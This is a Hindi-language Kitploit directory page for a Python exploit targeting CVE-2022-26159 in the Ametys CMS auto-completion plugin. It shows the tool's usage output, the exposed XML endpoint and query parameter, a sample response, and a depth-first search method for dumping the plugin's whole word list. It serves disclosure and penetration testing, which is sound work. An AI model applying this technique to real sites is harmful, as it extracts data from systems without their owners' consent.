Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-26159-Ametys-Autocompletion-XML — Ametys CMS के ऑटो-कम्प्लीशन प्लगइन द्वारा संग्रहीत सभी डेटा को स्वचालित रूप से एक स्थानीय sqlite डेटाबेस फ़ाइल में डंप करने के लिए एक python एक्सप्लॉइट। | Kitploit
उपकरण/GitHubGitHub/p0dalirius/cve-2022-26159-ametys-autocompletion-xml
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनजानकारी एकत्र करनाक्रॉलर
GitHubp0dalirius/cve-2022-26159-ametys-autocompletion-xml

CVE-2022-26159-Ametys-Autocompletion-XML

Ametys CMS के ऑटो-कम्प्लीशन प्लगइन द्वारा संग्रहीत सभी डेटा को स्वचालित रूप से एक स्थानीय sqlite डेटाबेस फ़ाइल में डंप करने के लिए एक python एक्सप्लॉइट।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखेंवेबसाइट
1434 साल पहलेअभी तक समीक्षित नहीं

CVE-2022-26159-Ametys-Autocompletion-XML

Ametys CMS के ऑटो-कम्प्लीशन प्लगइन द्वारा संग्रहीत सभी डेटा को स्वचालित रूप से एक स्थानीय sqlite डेटाबेस फ़ाइल में डंप करने के लिए एक python एक्सप्लॉइट।
GitHub release (latest by date) YouTube Channel Subscribers

विशेषताएँ

  • ऑटो-कम्प्लीशन प्लगइन द्वारा लौटाए गए अधिकतम परिणामों का स्वचालित पता लगाना।
  • सभी परिणामों को डंप करने के लिए डेप्थ-फर्स्ट सर्च।
  • आउटपुट लॉग फ़ाइल।

उपयोग

root@kitploit:~
$ ./CVE-2022-26159-Ametys-Autocompletion-XML.py -h
CVE-2022-26159-Ametys-Autocompletion-XML v1.1 - by @podalirius

usage: CVE-2022-26159-Ametys-Autocompletion-XML.py [-h] -t TARGET [-H HEADERS] [-k] [-v | -q] [--no-colors]

Description message

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        arg1 help message
  -H HEADERS, --header HEADERS
                        Specify HTTP headers to use in requests. (e.g., --header "Header1: Value1" --header "Header2: Value2")
  -k, --insecure        Disable SSL/TLS warnings and certificate verification.
  -v, --verbose         Verbose mode. (default: False)
  -q, --quiet           Quiet mode. (default: False)
  --no-colors           Disables colored output. (default: False)

तकनीकी विवरण

Ametys CMS <= 4.4.9 में ऑटो-कम्प्लीशन प्लगइन सार्वजनिक रूप से एक XML फ़ाइल उजागर करता है जिसमें निम्नलिखित पते पर एक वर्डलिस्ट होती है:

root@kitploit:~
https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml

इस डेटाबेस पर अनुरोध करने के लिए, एक हमलावर को केवल q (क्वेरी) पैरामीटर में शब्द की शुरुआत टाइप करनी होती है:

root@kitploit:~
https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml?q=adm

और ऑटो-कम्प्लीशन प्लगइन XML फ़ाइल में adm (क्वेरी से) से शुरू होने वाले पहले 10 मिलान वाले शब्द लौटाता है:

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<auto-completion>
    <item>administrateur</item>
    <item>administrateurs</item>
    <item>administratif</item>
    <item>administratifs</item>
    <item>administration</item>
    <item>administrations</item>
    <item>administrative</item>
    <item>administratives</item>
    <item>administres</item>
    <item>admission</item>
</auto-completion>

इसे ध्यान में रखते हुए, एक हमलावर को इसकी सारी सामग्री निकालने के लिए केवल API पर डेप्थ-फर्स्ट सर्च करने की आवश्यकता होती है।

योगदान

पुल रिक्वेस्ट का स्वागत है। यदि आप अन्य सुविधाएँ जोड़ना चाहते हैं तो बेझिझक एक इश्यू खोलें।

संदर्भ

  • https://podalirius.net/en/cves/2022-26159/
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26159
  • https://issues.ametys.org/browse/CMS-10973
  • https://podalirius.net/en/articles/scraping-search-apis-depth-first-style/
टूल डाउनलोड करें